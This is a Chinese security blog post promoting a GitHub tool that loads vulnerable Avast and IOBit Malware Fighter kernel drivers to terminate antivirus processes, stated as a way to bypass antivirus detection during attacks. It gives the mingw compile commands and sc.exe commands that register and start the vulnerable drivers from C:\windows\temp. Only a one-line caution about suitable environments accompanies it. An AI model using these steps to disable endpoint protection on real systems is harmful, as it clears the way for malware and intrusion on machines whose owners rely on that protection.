进程杀手驱动程序的利用

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/xalicex/Killers

小编推荐

这是一个Github项目,里面包含了两个可执行文件:

  • avast_killer.exe
  • iobit_malwarefighter_killer.exe

这两个文件的作用是用来关闭Avast和IOBit Malware Fighter这两个杀毒软件的驱动程序。

相关技术点

  • mingw-w64:一个用于生成Windows应用程序的工具集。
  • GCC:一种编译器,可以将C/C++源代码编译成可执行文件。
  • Windows驱动程序:用于操作系统内核的软件模块,可以操作硬件设备和系统资源。

项目用途

这个项目的主要用途是让用户能够关闭Avast和IOBit Malware Fighter这两个杀毒软件的驱动程序,从而可以执行一些绕过杀毒软件检测的攻击。同时,这也是一种网络安全测试的方法,用于测试杀毒软件的防御能力。但需要注意的是,这样的行为可能会对系统造成安全风险和损害,所以需要在合适的环境下进行。

杀手

ad1a1b7183205022

 

 

Avast

https://www.loldrivers.io/drivers/57fc510a-e649-4599-b83e-8f3605e3d1d9/

x86_64-w64-mingw32-gcc -o avast_killer.exe avast_killer.c 
sc.exe create aswArPot.sys binPath= C:\windows\temp\aswArPot.bin type= kernel && sc.exe start aswArPot.sys

IOBit Malware Fighter

https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331

x86_64-w64-mingw32-gcc -o iobit_malwarefighter_killer.exe iobit_malwarefighter_killer.c 
sc.exe create kEvP64.sys binPath= C:\windows\temp\kEvP64.bin type= kernel && sc.exe start kEvP64.sys
标签:工具分享, 主机安全